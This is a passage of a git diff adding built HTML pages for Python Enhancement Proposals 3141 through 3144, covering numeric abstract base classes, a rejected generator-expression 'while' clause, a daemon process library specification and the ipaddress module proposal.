+        """Return a builtin complex instance."""
+
+    def __bool__(self):
+        """True if self != 0."""
+        return self != 0
+
+    @abstractproperty
+    def real(self):
+        """Retrieve the real component of this number.
+
+        This should subclass Real.
+        """
+        raise NotImplementedError
+
+    @abstractproperty
+    def imag(self):
+        """Retrieve the imaginary component of this number.
+
+        This should subclass Real.
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __add__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __radd__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __neg__(self):
+        raise NotImplementedError
+
+    def __pos__(self):
+        """Coerces self to whatever class defines the method."""
+        raise NotImplementedError
+
+    def __sub__(self, other):
+        return self + -other
+
+    def __rsub__(self, other):
+        return -self + other
+
+    @abstractmethod
+    def __mul__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rmul__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __div__(self, other):
+        """a/b; should promote to float or complex when necessary."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rdiv__(self, other):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __pow__(self, exponent):
+        """a**b; should promote to float or complex when necessary."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rpow__(self, base):
+        raise NotImplementedError
+
+    @abstractmethod
+    def __abs__(self):
+        """Returns the Real distance from 0."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def conjugate(self):
+        """(x+y*i).conjugate() returns (x-y*i)."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __eq__(self, other):
+        raise NotImplementedError
+
+    # __ne__ is inherited from object and negates whatever __eq__ does.
+
+
+

The Real ABC indicates that the value is on the real line, and +supports the operations of the float builtin. Real numbers are +totally ordered except for NaNs (which this PEP basically ignores).

+
class Real(Complex):
+    """To Complex, Real adds the operations that work on real numbers.
+
+    In short, those are: conversion to float, trunc(), math.floor(),
+    math.ceil(), round(), divmod(), //, %, <, <=, >, and >=.
+
+    Real also provides defaults for some of the derived operations.
+    """
+
+    # XXX What to do about the __int__ implementation that's
+    # currently present on float?  Get rid of it?
+
+    @abstractmethod
+    def __float__(self):
+        """Any Real can be converted to a native float object."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __trunc__(self):
+        """Truncates self to an Integral.
+
+        Returns an Integral i such that:
+          * i>=0 iff self>0;
+          * abs(i) <= abs(self);
+          * for any Integral j satisfying the first two conditions,
+            abs(i) >= abs(j) [i.e. i has "maximal" abs among those].
+        i.e. "truncate towards 0".
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __floor__(self):
+        """Finds the greatest Integral <= self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __ceil__(self):
+        """Finds the least Integral >= self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __round__(self, ndigits:Integral=None):
+        """Rounds self to ndigits decimal places, defaulting to 0.
+
+        If ndigits is omitted or None, returns an Integral,
+        otherwise returns a Real, preferably of the same type as
+        self. Types may choose which direction to round half. For
+        example, float rounds half toward even.
+
+        """
+        raise NotImplementedError
+
+    def __divmod__(self, other):
+        """The pair (self // other, self % other).
+
+        Sometimes this can be computed faster than the pair of
+        operations.
+        """
+        return (self // other, self % other)
+
+    def __rdivmod__(self, other):
+        """The pair (self // other, self % other).
+
+        Sometimes this can be computed faster than the pair of
+        operations.
+        """
+        return (other // self, other % self)
+
+    @abstractmethod
+    def __floordiv__(self, other):
+        """The floor() of self/other. Integral."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rfloordiv__(self, other):
+        """The floor() of other/self."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __mod__(self, other):
+        """self % other
+
+        See
+        https://mail.python.org/pipermail/python-3000/2006-May/001735.html
+        and consider using "self/other - trunc(self/other)"
+        instead if you're worried about round-off errors.
+        """
+        raise NotImplementedError
+
+    @abstractmethod
+    def __rmod__(self, other):
+        """other % self"""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __lt__(self, other):
+        """< on Reals defines a total ordering, except perhaps for NaN."""
+        raise NotImplementedError
+
+    @abstractmethod
+    def __le__(self, other):
+        raise NotImplementedError
+
+    # __gt__ and __ge__ are automatically done by reversing the arguments.
+    # (But __le__ is not computed as the opposite of __gt__!)
+
+    # Concrete implementations of Complex abstract methods.
+    # Subclasses may override these, but don't have to.
+
+    def __complex__(self):
+        return complex(float(self))
+
+    @property
+    def real(self):
+        return +self
+
+    @property
+    def imag(self):
+        return 0
+
+    def conjugate(self):
+        """Conjugate is a no-op for Reals."""
+        return +self
+
+
+

We should clean up Demo/classes/Rat.py and promote it into +rational.py in the standard library. Then it will implement the +Rational ABC.

+
class Rational(Real, Exact):
+    """.numerator and .denominator should be in lowest terms."""
+
+    @abstractproperty
+    def numerator(self):
+        raise NotImplementedError
+
+    @abstractproperty
+    def denominator(self):
+        raise NotImplementedError
+
+    # Concrete implementation of Real's conversion to float.
+    # (This invokes Integer.__div__().)
+
+    def __float__(self):
+        return self.numerator / self.denominator
+
+
+

And finally integers:

+
class Integral(Rational):
+    """Integral adds a conversion to int and the bit-string operations."""
+
+    @abstractmethod
+    def __int__(self):
+        raise NotImplementedError
+
+    def __index__(self):
+        """__index__() exists because float has __int__()."""
+        return int(self)
+
+    def __lshift__(self, other):
+        return int(self) << int(other)
+
+    def __rlshift__(self, other):
+        return int(other) << int(self)
+
+    def __rshift__(self, other):
+        return int(self) >> int(other)
+
+    def __rrshift__(self, other):
+        return int(other) >> int(self)
+
+    def __and__(self, other):
+        return int(self) & int(other)
+
+    def __rand__(self, other):
+        return int(other) & int(self)
+
+    def __xor__(self, other):
+        return int(self) ^ int(other)
+
+    def __rxor__(self, other):
+        return int(other) ^ int(self)
+
+    def __or__(self, other):
+        return int(self) | int(other)
+
+    def __ror__(self, other):
+        return int(other) | int(self)
+
+    def __invert__(self):
+        return ~int(self)
+
+    # Concrete implementations of Rational and Real abstract methods.
+    def __float__(self):
+        """float(self) == float(int(self))"""
+        return float(int(self))
+
+    @property
+    def numerator(self):
+        """Integers are their own numerators."""
+        return +self
+
+    @property
+    def denominator(self):
+        """Integers have a denominator of 1."""
+        return 1
+
+
+
+
+

Changes to operations and __magic__ methods

+

To support more precise narrowing from float to int (and more +generally, from Real to Integral), we propose the following new +__magic__ methods, to be called from the corresponding library +functions. All of these return Integrals rather than Reals.

+
    +
  1. __trunc__(self), called from a new builtin trunc(x), which +returns the Integral closest to x between 0 and x.
  2. +
  3. __floor__(self), called from math.floor(x), which returns +the greatest Integral <= x.
  4. +
  5. __ceil__(self), called from math.ceil(x), which returns the +least Integral >= x.
  6. +
  7. __round__(self), called from round(x), which returns the +Integral closest to x, rounding half as the type chooses. +float will change in 3.0 to round half toward even. There is +also a 2-argument version, __round__(self, ndigits), called +from round(x, ndigits), which should return a Real.
  8. +
+

In 2.6, math.floor, math.ceil, and round will continue to +return floats.

+

The int() conversion implemented by float is equivalent to +trunc(). In general, the int() conversion should try +__int__() first and if it is not found, try __trunc__().

+
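The described lookup order can be sketched roughly as follows +(illustrative only; the real conversion is implemented in C inside the +interpreter):

+
def as_int(x):
+    """int(x): try __int__ first, then fall back to __trunc__."""
+    cls = type(x)
+    if hasattr(cls, '__int__'):
+        return cls.__int__(x)
+    if hasattr(cls, '__trunc__'):
+        return cls.__trunc__(x)
+    raise TypeError("cannot convert %r to an integer" % (x,))
+
+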

complex.__{divmod,mod,floordiv,int,float}__ also go away. It would +be nice to provide a helpful error message for confused porters, but +not appearing in help(complex) is more important.

+
+
+

Notes for type implementors

+

Implementors should be careful to make equal numbers equal and +hash them to the same values. This may be subtle if there are two +different extensions of the real numbers. For example, a complex type +could reasonably implement hash() as follows:

+
def __hash__(self):
+    return hash(complex(self))
+
+
+

but should be careful of any values that fall outside of the built-in +complex’s range or precision.

+
+

Adding More Numeric ABCs

+

There are, of course, more possible ABCs for numbers, and this would +be a poor hierarchy if it precluded the possibility of adding +those. You can add MyFoo between Complex and Real with:

+
class MyFoo(Complex): ...
+MyFoo.register(Real)
+
+
+
+
+

Implementing the arithmetic operations

+

We want to implement the arithmetic operations so that mixed-mode +operations either call an implementation whose author knew about the +types of both arguments, or convert both to the nearest built in type +and do the operation there. For subtypes of Integral, this means that +__add__ and __radd__ should be defined as:

+
class MyIntegral(Integral):
+
+    def __add__(self, other):
+        if isinstance(other, MyIntegral):
+            return do_my_adding_stuff(self, other)
+        elif isinstance(other, OtherTypeIKnowAbout):
+            return do_my_other_adding_stuff(self, other)
+        else:
+            return NotImplemented
+
+    def __radd__(self, other):
+        if isinstance(other, MyIntegral):
+            return do_my_adding_stuff(other, self)
+        elif isinstance(other, OtherTypeIKnowAbout):
+            return do_my_other_adding_stuff(other, self)
+        elif isinstance(other, Integral):
+            return int(other) + int(self)
+        elif isinstance(other, Real):
+            return float(other) + float(self)
+        elif isinstance(other, Complex):
+            return complex(other) + complex(self)
+        else:
+            return NotImplemented
+
+
+

There are 5 different cases for a mixed-type operation on subclasses +of Complex. I’ll refer to all of the above code that doesn’t refer to +MyIntegral and OtherTypeIKnowAbout as “boilerplate”. a will be an +instance of A, which is a subtype of Complex (a : A <: +Complex), and b : B <: Complex. I’ll consider a + b:

+
    +
  1. If A defines an __add__ which accepts b, all is well.
  2. +
  3. If A falls back to the boilerplate code, and it were to return +a value from __add__, we’d miss the possibility that B defines +a more intelligent __radd__, so the boilerplate should return +NotImplemented from __add__. (Or A may not implement __add__ at +all.)
  4. +
  5. Then B’s __radd__ gets a chance. If it accepts a, all is well.
  6. +
  7. If it falls back to the boilerplate, there are no more possible +methods to try, so this is where the default implementation +should live.
  8. +
  9. If B <: A, Python tries B.__radd__ before A.__add__. This is +ok, because it was implemented with knowledge of A, so it can +handle those instances before delegating to Complex.
  10. +
+

If A<:Complex and B<:Real without sharing any other knowledge, +then the appropriate shared operation is the one involving the +built-in complex, and both __radd__s land there, so a+b == b+a.

+
+
+
+
+

Rejected Alternatives

+

The initial version of this PEP defined an algebraic hierarchy +inspired by a Haskell Numeric Prelude [2] including +MonoidUnderPlus, AdditiveGroup, Ring, and Field, and mentioned several +other possible algebraic types before getting to the numbers. We had +expected this to be useful to people using vectors and matrices, but +the NumPy community really wasn’t interested, and we ran into the +issue that even if x is an instance of X <: MonoidUnderPlus +and y is an instance of Y <: MonoidUnderPlus, x + y may +still not make sense.

+

Then we gave the numbers a much more branching structure to include +things like the Gaussian Integers and Z/nZ, which could be Complex but +wouldn’t necessarily support things like division. The community +decided that this was too much complication for Python, so I’ve now +scaled back the proposal to resemble the Scheme numeric tower much +more closely.

+
+
+

The Decimal Type

+

After consultation with its authors it has been decided that the +Decimal type should not at this time be made part of the numeric +tower.

+
+
+

References

+ +
+
+

Acknowledgements

+

Thanks to Neal Norwitz for encouraging me to write this PEP in the +first place, to Travis Oliphant for pointing out that the numpy people +didn’t really care about the algebraic concepts, to Alan Isaac for +reminding me that Scheme had already done this, and to Guido van +Rossum and lots of other people on the mailing list for refining the +concept.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3141.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3142/index.html b/pep-3142/index.html new file mode 100644 index 00000000000..f398e622367 --- /dev/null +++ b/pep-3142/index.html @@ -0,0 +1,222 @@ + + + + + + + + PEP 3142 – Add a “while” clause to generator expressions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3142 – Add a “while” clause to generator expressions

+
+
Author:
+
Gerald Britton <gerald.britton at gmail.com>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
12-Jan-2009
+
Python-Version:
+
3.0
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes an enhancement to generator expressions, adding a +“while” clause to complement the existing “if” clause.

+
+
+

Rationale

+

A generator expression (PEP 289) is a concise method to serve +dynamically-generated objects to list comprehensions (PEP 202). +Current generator expressions allow for an “if” clause to filter +the objects that are returned to those meeting some set of +criteria. However, since the “if” clause is evaluated for every +object that may be returned, in some cases it is possible that all +objects would be rejected after a certain point. For example:

+
g = (n for n in range(100) if n*n < 50)
+
+
+

which is equivalent to using a generator function +(PEP 255):

+
def __gen(exp):
+    for n in exp:
+        if n*n < 50:
+            yield n
+g = __gen(iter(range(100)))
+
+
+

would yield 0, 1, 2, 3, 4, 5, 6 and 7, but would also consider +the numbers from 8 to 99 and reject them all since n*n >= 50 for +numbers in that range. Allowing for a “while” clause would allow +the redundant tests to be short-circuited:

+
g = (n for n in range(100) while n*n < 50)
+
+
+

would also yield 0, 1, 2, 3, 4, 5, 6 and 7, but would stop at 8 +since the condition (n*n < 50) is no longer true. This would be +equivalent to the generator function:

+
def __gen(exp):
+    for n in exp:
+        if n*n < 50:
+            yield n
+        else:
+            break
+g = __gen(iter(range(100)))
+
+
+

Currently, in order to achieve the same result, one would need to +either write a generator function such as the one above or use the +takewhile function from itertools:

+
from itertools import takewhile
+g = takewhile(lambda n: n*n < 50, range(100))
+
+
+

The takewhile code achieves the same result as the proposed syntax, +albeit in a longer (some would say “less-elegant”) fashion. Also, +the takewhile version requires an extra function call (the lambda +in the example above) with the associated performance penalty. +A simple test shows that:

+
for n in (n for n in range(100) if 1): pass
+
+
+

performs about 10% better than:

+
for n in takewhile(lambda n: 1, range(100)): pass
+
+
+

though they achieve similar results. (The first example uses a +generator; takewhile is an iterator). If similarly implemented, +a “while” clause should perform about the same as the “if” clause +does today.

+

The reader may ask if the “if” and “while” clauses should be +mutually exclusive. There are good examples that show that there +are times when both may be used to good advantage. For example:

+
p = (p for p in primes() if p > 100 while p < 1000)
+
+
+

should return prime numbers found between 100 and 1000, assuming +I have a primes() generator that yields prime numbers.

+
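A primes() generator of the assumed kind could be written as follows +(a simple trial-division sketch, not part of the proposal):

+
from itertools import count
+
+def primes():
+    """Yield prime numbers indefinitely."""
+    for n in count(2):
+        if all(n % d for d in range(2, int(n ** 0.5) + 1)):
+            yield n
+
+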

Adding a “while” clause to generator expressions maintains the +compact form while adding a useful facility for short-circuiting +the expression.

+
+
+

Acknowledgements

+

Raymond Hettinger first proposed the concept of generator +expressions in January 2002.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3142.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3143/index.html b/pep-3143/index.html new file mode 100644 index 00000000000..80b358d4451 --- /dev/null +++ b/pep-3143/index.html @@ -0,0 +1,678 @@ + + + + + + + + PEP 3143 – Standard daemon process library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3143 – Standard daemon process library

+
+
Author:
+
Ben Finney <ben+python at benfinney.id.au>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
26-Jan-2009
+
Python-Version:
+
3.x
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

Writing a program to become a well-behaved Unix daemon is somewhat +complex and tricky to get right, yet the steps are largely similar for +any daemon regardless of what else the program may need to do.

+

This PEP introduces a package to the Python standard library that +provides a simple interface to the task of becoming a daemon process.

+
+
+

PEP Deferral

+

Further exploration of the concepts covered in this PEP has been deferred +for lack of a current champion interested in promoting the goals of the PEP +and collecting and incorporating feedback, and with sufficient available +time to do so effectively.

+
+
+

Specification

+
+

Example usage

+

Simple example of direct DaemonContext usage:

+
import daemon
+
+from spam import do_main_program
+
+with daemon.DaemonContext():
+    do_main_program()
+
+
+

More complex example usage:

+
import os
+import grp
+import signal
+import daemon
+import lockfile
+
+from spam import (
+    initial_program_setup,
+    do_main_program,
+    program_cleanup,
+    reload_program_config,
+    )
+
+context = daemon.DaemonContext(
+    working_directory='/var/lib/foo',
+    umask=0o002,
+    pidfile=lockfile.FileLock('/var/run/spam.pid'),
+    )
+
+context.signal_map = {
+    signal.SIGTERM: program_cleanup,
+    signal.SIGHUP: 'terminate',
+    signal.SIGUSR1: reload_program_config,
+    }
+
+mail_gid = grp.getgrnam('mail').gr_gid
+context.gid = mail_gid
+
+important_file = open('spam.data', 'w')
+interesting_file = open('eggs.data', 'w')
+context.files_preserve = [important_file, interesting_file]
+
+initial_program_setup()
+
+with context:
+    do_main_program()
+
+
+
+
+

Interface

+

A new package, daemon, is added to the standard library.

+

A class, DaemonContext, is defined to represent the settings and +process context for the program running as a daemon process.

+
+
+

DaemonContext objects

+

A DaemonContext instance represents the behaviour settings and +process context for the program when it becomes a daemon. The +behaviour and environment is customised by setting options on the +instance, before calling the open method.

+

Each option can be passed as a keyword argument to the DaemonContext +constructor, or subsequently altered by assigning to an attribute on +the instance at any time prior to calling open. That is, for +options named wibble and wubble, the following invocation:

+
foo = daemon.DaemonContext(wibble=bar, wubble=baz)
+foo.open()
+
+
+

is equivalent to:

+
foo = daemon.DaemonContext()
+foo.wibble = bar
+foo.wubble = baz
+foo.open()
+
+
+

The following options are defined.

+
+
files_preserve
+
Default:
+
None
+
+

List of files that should not be closed when starting the +daemon. If None, all open file descriptors will be closed.

+

Elements of the list are file descriptors (as returned by a file +object’s fileno() method) or Python file objects. Each +specifies a file that is not to be closed during daemon start.

+
+
chroot_directory
+
Default:
+
None
+
+

Full path to a directory to set as the effective root directory of +the process. If None, specifies that the root directory is not +to be changed.

+
+
working_directory
+
Default:
+
'/'
+
+

Full path of the working directory to which the process should +change on daemon start.

+

Since a filesystem cannot be unmounted if a process has its +current working directory on that filesystem, this should either +be left at default or set to a directory that is a sensible “home +directory” for the daemon while it is running.

+
+
umask
+
Default:
+
0
+
+

File access creation mask (“umask”) to set for the process on +daemon start.

+

Since a process inherits its umask from its parent process, +starting the daemon will reset the umask to this value so that +files are created by the daemon with access modes as it expects.

+
+
pidfile
+
Default:
+
None
+
+

Context manager for a PID lock file. When the daemon context opens +and closes, it enters and exits the pidfile context manager.

+
+
detach_process
+
Default:
+
None
+
+

If True, detach the process context when opening the daemon +context; if False, do not detach.

+

If unspecified (None) during initialisation of the instance, +this will be set to True by default, and False only if +detaching the process is determined to be redundant; for example, +in the case when the process was started by init, by initd, or +by inetd.

+
+
signal_map
+
Default:
+
system-dependent
+
+

Mapping from operating system signals to callback actions.

+

The mapping is used when the daemon context opens, and determines +the action for each signal’s signal handler:

+
    +
  • A value of None will ignore the signal (by setting the +signal action to signal.SIG_IGN).
  • +
  • A string value will be used as the name of an attribute on the +DaemonContext instance. The attribute’s value will be used +as the action for the signal handler.
  • +
  • Any other value will be used as the action for the signal +handler.
  • +
+

The default value depends on which signals are defined on the +running system. Each item from the list below whose signal is +actually defined in the signal module will appear in the +default map:

+
    +
  • signal.SIGTTIN: None
  • +
  • signal.SIGTTOU: None
  • +
  • signal.SIGTSTP: None
  • +
  • signal.SIGTERM: 'terminate'
  • +
+

Depending on how the program will interact with its child +processes, it may need to specify a signal map that includes the +signal.SIGCHLD signal (received when a child process exits). +See the specific operating system’s documentation for more detail +on how to determine what circumstances dictate the need for signal +handlers.

+
+
uid
+
Default:
+
os.getuid()
+
+
+
gid
+
Default:
+
os.getgid()
+
+

The user ID (“UID”) value and group ID (“GID”) value to switch +the process to on daemon start.

+

The default values, the real UID and GID of the process, will +relinquish any effective privilege elevation inherited by the +process.

+
+
prevent_core
+
Default:
+
True
+
+

If true, prevents the generation of core files, in order to avoid +leaking sensitive information from daemons run as root.

+
+
stdin
+
Default:
+
None
+
+
+
stdout
+
Default:
+
None
+
+
+
stderr
+
Default:
+
None
+
+

Each of stdin, stdout, and stderr is a file-like object +which will be used as the new file for the standard I/O stream +sys.stdin, sys.stdout, and sys.stderr respectively. The file +should therefore be open, with a minimum of mode ‘r’ in the case +of stdin, and mode ‘w+’ in the case of stdout and stderr.

+

If the object has a fileno() method that returns a file +descriptor, the corresponding file will be excluded from being +closed during daemon start (that is, it will be treated as though +it were listed in files_preserve).

+

If None, the corresponding system stream is re-bound to the +file named by os.devnull.

+
+
+

The following methods are defined.

+
+
open()
+
Return:
+
None
+
+

Open the daemon context, turning the current program into a daemon +process. This performs the following steps:

+
    +
  • If this instance’s is_open property is true, return +immediately. This makes it safe to call open multiple times on +an instance.
  • +
  • If the prevent_core attribute is true, set the resource limits +for the process to prevent any core dump from the process.
  • +
  • If the chroot_directory attribute is not None, set the +effective root directory of the process to that directory (via +os.chroot).

    This allows running the daemon process inside a “chroot gaol” +as a means of limiting the system’s exposure to rogue behaviour +by the process. Note that the specified directory needs to +already be set up for this purpose.

    +
  • +
  • Set the process UID and GID to the uid and gid attribute +values.
  • +
  • Close all open file descriptors. This excludes those listed in +the files_preserve attribute, and those that correspond to the +stdin, stdout, or stderr attributes.
  • +
  • Change current working directory to the path specified by the +working_directory attribute.
  • +
  • Reset the file access creation mask to the value specified by +the umask attribute.
  • +
  • If the detach_process option is true, detach the current +process into its own process group, and disassociate from any +controlling terminal.
  • +
  • Set signal handlers as specified by the signal_map attribute.
  • +
  • If any of the attributes stdin, stdout, stderr are not +None, bind the system streams sys.stdin, sys.stdout, +and/or sys.stderr to the files represented by the +corresponding attributes. Where the attribute has a file +descriptor, the descriptor is duplicated (instead of re-binding +the name).
  • +
  • If the pidfile attribute is not None, enter its context +manager.
  • +
  • Mark this instance as open (for the purpose of future open and +close calls).
  • +
  • Register the close method to be called during Python’s exit +processing.
  • +
+

When the function returns, the running program is a daemon +process.

+
+
close()
+
Return:
+
None
+
+

Close the daemon context. This performs the following steps:

+
    +
  • If this instance’s is_open property is false, return +immediately. This makes it safe to call close multiple times +on an instance.
  • +
  • If the pidfile attribute is not None, exit its context +manager.
  • +
  • Mark this instance as closed (for the purpose of future open +and close calls).
  • +
+
+
is_open
+
Return:
+
True if the instance is open, False otherwise.
+
+

This property exposes the state indicating whether the instance is +currently open. It is True if the instance’s open method has +been called and the close method has not subsequently been +called.

+
+
terminate(signal_number, stack_frame)
+
Return:
+
None
+
+

Signal handler for the signal.SIGTERM signal. Performs the +following step:

+
    +
  • Raise a SystemExit exception explaining the signal.
  • +
+
+
+

The class also implements the context manager protocol via +__enter__ and __exit__ methods.

+
+
__enter__()
+
Return:
+
The DaemonContext instance
+
+

Call the instance’s open() method, then return the instance.

+
+
__exit__(exc_type, exc_value, exc_traceback)
+
Return:
+
True or False as defined by the context manager +protocol
+
+

Call the instance’s close() method, then return True if the +exception was handled or False if it was not.
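In outline, the two methods reduce to something like this (a minimal +sketch of the specified behaviour, not the reference implementation):

+
class DaemonContext:
+    # ... options and open()/close() as specified above ...
+
+    def __enter__(self):
+        self.open()
+        return self
+
+    def __exit__(self, exc_type, exc_value, exc_traceback):
+        self.close()
+        return False   # assumed default: do not suppress exceptions
+
+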

+
+
+
+
+
+

Motivation

+

The majority of programs written to be Unix daemons either implement +behaviour very similar to that in the specification, or are +poorly behaved when measured against correct daemon behaviour.

+

Since these steps should be much the same in most implementations but +are very particular and easy to omit or implement incorrectly, they +are a prime target for a standard well-tested implementation in the +standard library.

+
+
+

Rationale

+
+

Correct daemon behaviour

+

According to Stevens in [stevens] §2.6, a program should perform the +following steps to become a Unix daemon process.

+
    +
  • Close all open file descriptors.
  • +
  • Change current working directory.
  • +
  • Reset the file access creation mask.
  • +
  • Run in the background.
  • +
  • Disassociate from process group.
  • +
  • Ignore terminal I/O signals.
  • +
  • Disassociate from control terminal.
  • +
  • Don’t reacquire a control terminal.
  • +
  • Correctly handle the following circumstances:
      +
    • Started by System V init process.
    • +
    • Daemon termination by SIGTERM signal.
    • +
    • Children generate SIGCLD signal.
    • +
    +
  • +
+

The daemon tool [slack-daemon] lists (in its summary of features) +behaviour that should be performed when turning a program into a +well-behaved Unix daemon process. It differs from this PEP’s intent in +that it invokes a separate program as a daemon process. The +following features are appropriate for a daemon that starts itself +once the program is already running:

+
    +
  • Sets up the correct process context for a daemon.
  • +
  • Behaves sensibly when started by initd(8) or inetd(8).
  • +
  • Revokes any suid or sgid privileges to reduce security risks in case +daemon is incorrectly installed with special privileges.
  • +
  • Prevents the generation of core files to prevent leaking sensitive +information from daemons run as root (optional).
  • +
  • Names the daemon by creating and locking a PID file to guarantee +that only one daemon with the given name can execute at any given +time (optional).
  • +
  • Sets the user and group under which to run the daemon (optional, +root only).
  • +
  • Creates a chroot gaol (optional, root only).
  • +
  • Captures the daemon’s stdout and stderr and directs them to syslog +(optional).
  • +
+
+
+

A daemon is not a service

+

This PEP addresses only Unix-style daemons, for which the above +correct behaviour is relevant, as opposed to comparable behaviours on +other operating systems.

+

There is a related concept in many systems, called a “service”. A +service differs from the model in this PEP, in that rather than having +the current program continue to run as a daemon process, a service +starts an additional process to run in the background, and the +current process communicates with that additional process via some +defined channels.

+

The Unix-style daemon model in this PEP can be used, among other +things, to implement the background-process part of a service; but +this PEP does not address the other aspects of setting up and managing +a service.

+
+
+
+

Reference Implementation

+

The python-daemon package [python-daemon].

+
+

Other daemon implementations

+

Prior to this PEP, several existing third-party Python libraries or +tools implemented some of this PEP’s correct daemon behaviour.

+

The reference implementation is a fairly direct successor from the +following implementations:

+ +

Other Python daemon implementations that differ from this PEP:

+
    +
  • The zdaemon tool [zdaemon] was written for the Zope project. Like +[slack-daemon], it differs from this specification because it is +used to run another program as a daemon process.
  • +
  • The Python library daemon [clapper-daemon] is (according to its +homepage) no longer maintained. As of version 1.0.1, it implements +the basic steps from [stevens].
  • +
  • The daemonize library [seutter-daemonize] also implements the +basic steps from [stevens].
  • +
  • Ray Burr’s daemon.py module [burr-daemon] provides the [stevens] +procedure as well as PID file handling and redirection of output to +syslog.
  • +
  • Twisted [twisted] includes, perhaps unsurprisingly, an +implementation of a process daemonisation API that is integrated +with the rest of the Twisted framework; it differs significantly +from the API in this PEP.
  • +
  • The Python initd library [dagitses-initd], which uses +[clapper-daemon], implements an equivalent of Unix initd(8) for +controlling a daemon process.
  • +
+
+
+
+

References

+
+
+
[stevens] (1, 2, 3, 4)
+
Unix Network Programming, W. Richard Stevens, 1994 Prentice +Hall.
+
+
[slack-daemon] (1, 2)
+
The (non-Python) “libslack” implementation of a daemon tool +http://www.libslack.org/daemon/ by “raf” <raf@raf.org>.
+
+
[python-daemon] (1, 2)
+
The python-daemon library +http://pypi.python.org/pypi/python-daemon/ by Ben Finney et +al.
+
+
[cookbook-66012] (1, 2)
+
Python Cookbook recipe 66012, “Fork a daemon process on Unix” +http://code.activestate.com/recipes/66012/.
+
+
[cookbook-278731]
+
Python Cookbook recipe 278731, “Creating a daemon the Python way” +http://code.activestate.com/recipes/278731/.
+
+
[bda.daemon]
+
The bda.daemon library +http://pypi.python.org/pypi/bda.daemon/ by Robert +Niederreiter et al.
+
+
[zdaemon]
+
The zdaemon tool http://pypi.python.org/pypi/zdaemon/ by +Guido van Rossum et al.
+
+
[clapper-daemon] (1, 2)
+
The daemon library http://pypi.python.org/pypi/daemon/ by +Brian Clapper.
+
+
[seutter-daemonize]
+
The daemonize library http://daemonize.sourceforge.net/ by +Jerry Seutter.
+
+
[burr-daemon]
+
The daemon.py module +http://www.nightmare.com/~ryb/code/daemon.py by Ray Burr.
+
+
[twisted]
+
The Twisted application framework +http://pypi.python.org/pypi/Twisted/ by Glyph Lefkowitz et +al.
+
+
[dagitses-initd]
+
The Python initd library http://pypi.python.org/pypi/initd/ +by Michael Andreas Dagitses.
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3143.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3144/index.html b/pep-3144/index.html new file mode 100644 index 00000000000..19073bd7cd0 --- /dev/null +++ b/pep-3144/index.html @@ -0,0 +1,291 @@ + + + + + + + + PEP 3144 – IP Address Manipulation Library for the Python Standard Library | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3144 – IP Address Manipulation Library for the Python Standard Library

+
+
Author:
+
Peter Moody <pmoody at google.com>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
ipaddr-py-dev@googlegroups.com
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
06-Feb-2012
+
Python-Version:
+
3.3
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a design for an IP address manipulation module for +Python.

+
+
+

PEP Acceptance

+

This PEP was accepted by Alyssa Coghlan on the 15th of May, 2012.

+
+
+

Motivation

+

Several very good IP address modules for Python already exist. +The truth is that all of them struggle with the balance between +adherence to Pythonic principles and the shorthand upon which +network engineers and administrators rely. ipaddress aims to +strike the right balance.

+
+
+

Rationale

+

The existence of several Python IP address manipulation modules is +evidence of an outstanding need for the functionality this module +seeks to provide.

+
+
+

Background

+

PEP 3144 and ipaddr have been up for inclusion before. The +version of the library specified here is backwards incompatible +with the version on PyPI and the one which was discussed before. +In order to avoid confusing users of the current ipaddr, I’ve +renamed this version of the library ipaddress.

+

The main differences between ipaddr and ipaddress are +(a short sketch after this list illustrates two of them):

+
    +
  • ipaddress *Network classes are equivalent to the ipaddr *Network +class counterparts with the strict flag set to True.
  • +
  • ipaddress *Interface classes are equivalent to the ipaddr +*Network class counterparts with the strict flag set to False.
  • +
  • The factory functions in ipaddress were renamed to disambiguate +them from classes.
  • +
  • A few attributes were renamed to disambiguate their purpose as +well. (eg. network, network_address)
  • +
